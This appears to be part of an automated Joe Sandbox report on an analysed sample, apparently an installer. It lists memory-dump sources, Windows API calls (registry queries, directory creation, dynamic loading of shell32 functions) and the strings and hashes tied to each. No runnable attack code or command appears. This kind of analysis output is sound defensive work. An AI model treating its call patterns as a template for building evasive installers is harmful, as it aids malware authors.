                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                                    • String ID: Setup
                                                                                                    • API String ID: 504348408-3839654196
                                                                                                    • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                    • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                                    • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                    • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID: $=H
                                                                                                    • API String ID: 3660427363-3538597426
                                                                                                    • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                    • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                                    • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                    • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                                    APIs
                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                    • String ID: .tmp
                                                                                                    • API String ID: 1375471231-2986845003
                                                                                                    • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                    • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                                    • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                    • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                                    APIs
                                                                                                      • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                      • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                      • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                      • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                      • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                      • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                      • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                      • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                      • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                                      • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                                      • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                      • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                                    • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                                    • API String ID: 3869789854-2936008475
                                                                                                    • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                    • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                                    • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                    • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                                    APIs
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                    • API String ID: 3535843008-1113070880
                                                                                                    • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                                    • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                                                                    • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                                    • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                                      • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateErrorFileHandleLast
                                                                                                    • String ID: CreateFile
                                                                                                    • API String ID: 2528220319-823142352
                                                                                                    • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                                    • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                                                                    • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                                    • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                                    • API String ID: 71445658-2565060666
                                                                                                    • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                                    • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                                                    • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                                    • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                                                    APIs
                                                                                                      • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                                                      • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                      • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                                    • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                    • API String ID: 2906209438-2320870614
                                                                                                    • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                                    • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                                                                    • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                                    • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                      • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressErrorLibraryLoadModeProc
                                                                                                    • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                    • API String ID: 2492108670-2683653824
                                                                                                    • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                    • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                                                                    • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                    • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                                    APIs
                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2574300362-0
                                                                                                    • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                                    • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                                                    • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                                    • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                                                    APIs
                                                                                                    • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                                                                    • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                                                                    • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Append$System
                                                                                                    • String ID:
                                                                                                    • API String ID: 1489644407-0
                                                                                                    • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                                    • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                                                                    • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                                    • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
                                                                                                    APIs
                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                                                                    • TranslateMessage.USER32(?), ref: 0042448F
                                                                                                    • DispatchMessageA.USER32(?), ref: 00424499
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$DispatchPeekTranslate
                                                                                                    • String ID:
                                                                                                    • API String ID: 4217535847-0
                                                                                                    • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                                    • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                                                                    • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                                    • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                                                                    APIs
                                                                                                    • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                                                                    • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Prop$Window
                                                                                                    • String ID:
                                                                                                    • API String ID: 3363284559-0
                                                                                                    • Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                                    • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                                                                    • Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                                    • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(?), ref: 0041EE64
                                                                                                    • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                                                                    • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnableEnabledVisible
                                                                                                    • String ID:
                                                                                                    • API String ID: 3234591441-0
                                                                                                    • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                                    • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                                                    • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                                    • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                                                    APIs
                                                                                                    • SetActiveWindow.USER32(?), ref: 0046A02D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ActiveWindow
                                                                                                    • String ID: PrepareToInstall
                                                                                                    • API String ID: 2558294473-1101760603
                                                                                                    • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                    • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                                                                    • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                    • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: /:*?"<>|
                                                                                                    • API String ID: 0-4078764451
                                                                                                    • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                                    • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                                                                    • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
